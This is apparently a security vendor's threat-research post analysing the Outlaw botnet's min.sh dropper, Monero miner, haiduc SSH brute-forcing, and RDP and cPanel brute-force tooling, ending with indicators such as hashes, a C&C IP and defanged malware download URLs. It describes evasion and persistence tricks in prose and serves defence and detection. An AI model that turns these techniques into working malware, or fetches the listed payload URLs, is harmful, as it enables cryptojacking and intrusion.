Outlaw Group Distributes Botnet for Cryptocurrency-Mining, Scanning, and Brute-Force

We previously blogged about how we uncovered the operations of the hacking group we named Outlaw that uses an Internet Relay Chat (IRC) bot. This follow-up post covers a host part of the botnet operated by the group, which we found attempting to run a script on our IoT honeypot. The attacking bot used a tool called haiduc to search the internet for systems to attack, which it does by taking advantage of a common command injection vulnerability. If successful, it attempts to run the script min.sh (detected by Trend Micro as Coinminer.SH.MALXMR.ATNJ) on targeted hosts.

This time we spotted two variants of activities from Outlaw. The script used in the first version of its bot has two functionalities: the miner and Haiduc-based dropper. The code for the mining part also has two forms. One is in plain text bash/Perl script and the other is an obfuscated Perl script variant that avoids detection by content-inspecting intrusion prevention system (IPS)/firewalls.

The second variant of the code, distributed by the bot, was mainly designed to brute force and further exploit the Microsoft Remote Desktop Protocol and cloud administration cPanel in order to escalate the privileges. This intention of further exploitation is supported by the discovery of the list of servers, which run a vulnerable library libc.so.6 with a known vulnerability.

Overview of the first variant

The miner downloads and starts mining for Monero cryptocurrency, using the binary that is capable of running on both Linux and Android. This variant of the miner first checks for other running miners present on systems. If it finds a “foreign” miner in the target system, the script kills the related mining processes of previous miners and starts to run its own binaries. This means that the bot here is capable of hijacking the mining activities of other bots from unrelated botnets. Do note that some Mirai variants have the same capability, but unlike certain Mirai variants, this bot does not patch the victims to protect them from further infection/reinfection.

After the mining has started, the bot has a function that checks the process list if the miner is actually running. If not, it downloads the malicious files again from the source and restarts the mining process, including the check for the presence of other miners.

This process allows the attacker to steal the already compromised mining hosts from other attackers and reinfect already “owned” hosts with an updated version of the miner, thus continuing the operation even after the attackers’ XMR wallets have been hijacked.

Once the mining operation is established, the miner reports back to its owner through a compromised website that hosts a PHP script with a randomly generated name.

The other part of the script takes care of bot propagation. It uses the haiduc tool, which we previously noted to be a tool that the Outlaw group primarily uses. In this variant of the haiduc toolset, it is used to first brute force vulnerable hosts running an SSH service. For that, it takes variable lists hosted in a compromised website in the form of PHP scripts. Once the brute-force is successful, it then runs the command that spreads the bot. This is done by running the commands to install the initial min.sh script from compromised websites. It then scans various targets, as set by commanding PHP script, and sends results to the botnet administrator via email, hardcoded in one of the PHP scripts. In our previous blog, we noted the group’s use of an IRC bot to form a botnet, this time the bot is controlled via PHP. It remains, however, that the files for the miner and the haiduc toolset are from the same group.

The infecting bot uses the URL hxxp://www[.]karaibe.us/.foo/min.sh to download the malicious shell script. Curiously, the domain also had a Google Analytics script embedded in the source code, which might have allowed the bot’s admins to monitor the campaign. Currently, the domain is resolved to a basketball league standings site. This technique is used by the Outlaw group at all times, and it has become obvious that one of the group’s core activities is to exploit more websites over PHP vulnerabilities to get new C&C or content delivery servers.

Looking into **min.sh*, the infecting script***

Figure 1. Initial script, min.sh

Mining activity

The first part of the script downloads the mining binary and complementary files in the tgz archive. By adding another server/domain to the command in general, the attacker ensures that the threat will not be easily blocked when one system is taken down.

Note: In this example, it is the same destination — the difference is that it uses only IP once and the other uses fully qualified domain name (FQDN). Certain security information and event management (SIEM) tools can block one or another but usually not both as it might cause performance issues.

The downloaded archive is extracted and the working directory is moved to the hidden “.bin”. Usage of the hidden directory should help run the miner unnoticed by the system administrator.

It then runs the XMR mining binary, forwarding the output to “dev/null” while it is in the background.

Scanning activity

In the next step, the working directory is changed to “/tmp”. Hidden “.vd” directory file is also removed to ensure that only the most current version is used in the following steps. Next, the sslm.tgz is downloaded, extracted, and run from the directory. It is a haiduc-based scanner that generates the target using a PHP script, which is hosted on the C&C server.

It sends out “the introduction” of the compromised host (see figure below) into another PHP script, hosted in the URL hxxp://www[.]karaibe[.]us/[.]foo/remote/info[.]php.

Figure 2. POST request to the C&C

After “the introduction” to C&C, it changes the working directory back to “/tmp” and removes the infection script from the affected system.

Further scanning options found in the second variant of the bot

We have analyzed various forms of haiduc toolsets and have previously mentioned capturing variants of the toolkit, with a populated list of targets for compromise. The two variants of haiduc described have a purpose that has never been seen before: To test captured target systems for the presence of running Remote Desktop Protocol (RDP) or cPanel. RDP is used for remote management of Windows-based hosts and servers, while cPanel is an open-source cloud administration interface. If it finds either of the services on the target host, it will be saved for future exploitation.

Scanning via Remote Desktop Protocol (RDP)

A search on Shodan would reveal hundreds, if not thousands, of servers with open RDP ports publicly seen on the internet. In case of a compromise, an attacker can gain access to another subnet of the network that is not available on the internet (could help them pivot further in the enterprise network), steal sensitive information, spy on individuals, and control industrial systems, among others.

The script on the figure below was used to run a Perl script psc2 (detected by Trend Micro as ELF_PORTSCAN.TNK), which searched for RDP-related open ports. The output is fed to the tool called rdp (ELF 32-bit LSB executable, Intel 80386), which takes the remote host address provided by psc2 script and attempts to log in. The threat actor used this script variant for manual attacks.

Figure 3. First variant of the script running Perl script psc2 and rdp tool

The second variant of the starting script already has preparations to be controlled over a PHP-based C&C. In this case, the arguments included the “class” file (detected by Trend Micro as HKTL_SHARK.C). One variant of the class files listed known organizations, while the second one listed IPs’ classes based on their GeoIP location. Again, the script first runs the Perl-based port scanner and its outputs are supplied to the rdp tool (detected by Trend Micro as ELF_PORTSCAN.TNK). The tool had also an embedded wordlist, with 3,811 lines of generated credentials.

Figure 4. Second variant of the script running Perl script psc2 and rdp tool, with embedded wordlist

Attacking the cloud via cPanel

cPanel is a cloud hosting platform with a very common administration interface. It is often used by small- and medium-sized businesses (SMBs) for the management of their private cloud services. A successful attack could affect the victim tremendously as the attacker could hijack the whole cloud infrastructure containing sensitive data. Regardless of the possible consequences, it is common to have publicly available login interfaces for the cloud management interface, hosted on the company-owned subdomains. This bad habit is exploited by the following attack, which is simple yet can have a great impact on organizations.

Same as with RDP, the attack uses a list of victims rather than scanning the whole internet. Each host is enumerated for the presence of the subdomains using the non-malicious script “bing-ip2hosts,” developed by Morning Star Security. Results are output to the target list called “bios,” which is then fed to known brute tool (detected by Trend Micro as HKTL_PORTSCAN) used for brute force, in a wrapper bash script called “go.” The toolkit allows attackers to target certain countries using the “class” files. Script “go” is a bash wrapper, which uses the “class” to generate a list of IPs. “getdns” scripts get the subdomain lists by invoking the “bing-ip2hosts.” Finally, the brute will be called to perform the brute-force.

Figure 5. cPanel attack script

Conclusion and solutions

The hacking group Outlaw’s botnet is evolving. It gained the PHP command and control ability to overcome some IRC downfalls, for better C&C servers scalability and more functions introduced with PHP language.

The group tends to use well-known hacking tools and the haiduc tool as well, both usually wrapped in bash scripts that allow less-skilled users to run the tools. Haiduc itself is conspicuous and therefore can be monitored with low-interaction honeypots.

Regardless of the choice of the tools, the group is successful in getting new targets. So far, we spotted over 180,000 compromised hosts and 20,000 newly compromised hosts, including IoT systems, various websites, cloud-based virtual private servers (VPS), compromised Windows servers, to name a few, across the world.

Even mobile devices based on Android can be affected. This, however, requires the owner to root the device first, or alternatively run the infected files deliberately using a “chrooted” Linux-based system. We discovered that detecting the real IP/location is possible through this malware on Android devices.

First it seemed that the goal of the Outlaw group is to build an infrastructure capable of distributed denial of service (DDoS) against many known companies. Later, they have also facilitated brute forcing the SSH so they could grow the botnet further. Then the cryptocurrency mining started, with the latest discovery described in this blog that RDP and cPanel brute-force are also in the scope of the group’s operation.

To prevent risks involved in the hacking group Outlaw’s botnet operations, users can consider adopting security solutions that can defend against malicious bot-related activities through a cross-generational blend of threat defense techniques. Trend Micro XGen security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

For further details on how the group’s operations use different files, refer to this appendix.

Indicators of Compromise (IoCs)

aaaaa@gmail[.]com
deutscheshop@gmx[.]de
hoffmannklaus254@gmail[.]com
shopde2018@gmx[.]de

Related hashes (SHA-256)
4d62e6fd9e16b05a16859582cbbf6e841e2097ac6f25f35f2e078b3dfb490bb9	min.sh	Coinminer.SH.MALXMR.ATNJ
fac368bf471cb8152aad779884294352e5ebaee19efcecb6c5c147e3ada8997f	finish.php	Trojan.PHP.MINERMAILER.A
6163a3ca3be7c3b6e8449722f316be66079207e493830c1cf4e114128f4fb6a4	haiduc	HackTool.Linux.SSHBRUTE.A
4928a79c9e06cf4efe0110afada7ee8f1141c3f9021aff5419946cb535b99a0e	rand	Trojan.SH.MINERPORTSCAN.A
3f1fb3cb0cf903278934b7bd17581e49f3ac1b4eef4493096105a2ed792151b9	sparky.sh	Coinminer.SH.MALXMR.ATNJ
af4ad9bf3e954c6deae18154273b4f5ea37364b3fe1536f4ae362ef15a6ced38	start	Coinminer.SH.MALXMR.ATNJ
45ed59d5b27d22567d91a65623d3b7f11726f55b497c383bc2d8d330e5e17161	h32	HKTL_XHide.GA
7fe9d6d8b9390020862ca7dc9e69c1e2b676db5898e4bfad51d66250e9af3eaf	h64	HKTL_XHide.GA
c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031	md64	Coinminer.Linux.MALXMR.ATG
df51c6b13714079bbf276d5c5f907d873eb48f283d617415ff351a25bf834332	start	Coinminer.Linux.MALXMR.ATG
1f2c76173c7a1fbb6b28c6b9e0b8bceccbbbf2bea07518f71eb8cf21d13c7ac7	daemon	Coinminer.Linux.MALXMR.AA
5ffb00a0176f8797e81b242209ec7a6a29bbfac392259bf018f746a32bfd401d	xmrigMiner	Coinminer.Linux.MALXMR.AI
1f69b1441d5c6e351cae4c05ded6af7b2461b63b7bb52d5d9c40586d8acf545f	psc2	ELF_PORTSCAN.TNK
dca76c1502a5f2307b81c71f9283097872ab842bf5e1ea12a36983d6c61675c4	rdp	ELF_PORTSCAN.TNK
4b5bd8eeb308cd0e73c42e5de9c994822b06924a42f4782c090b33c56fc27979	start_	ELF_STARTER.A
8a4c8912c35449c194844b87cb7bace340e6ed3ba5ae141088a68054c8de1aad	brute	HKTL_PORTSCAN
97093a1ef729cb954b2a63d7ccc304b18d0243e2a77d87bbbb94741a0290d762	class	HKTL_SHARK.C

67[.]205[.]129[.]169 – C&C server
167[.]114[.]54[.]15 – Infecting IP
hxxp://www[.]karaibe[.]us/[.]foo/min[.]sh
hxxp://bookaires[.]com/feed/min[.]sh
hxxp://67[.]205[.]129[.]169/[.]foo/min[.]sh
hxxp://www[.]karaibe[.]us/[.]foo/remote/info[.]php – lists IP addresses/ targets for the scanning
hxxp://www[.]karaibe[.]us/[.]foo/feed/feedp[.]php – lists tested credentials
hxxp://www.karaibe[.]us/[.]foo/feed/class[.]php – first two octets of an IP address to be scanned
hxxp://www[.]karaibe[.]us/[.]foo/nano[.]php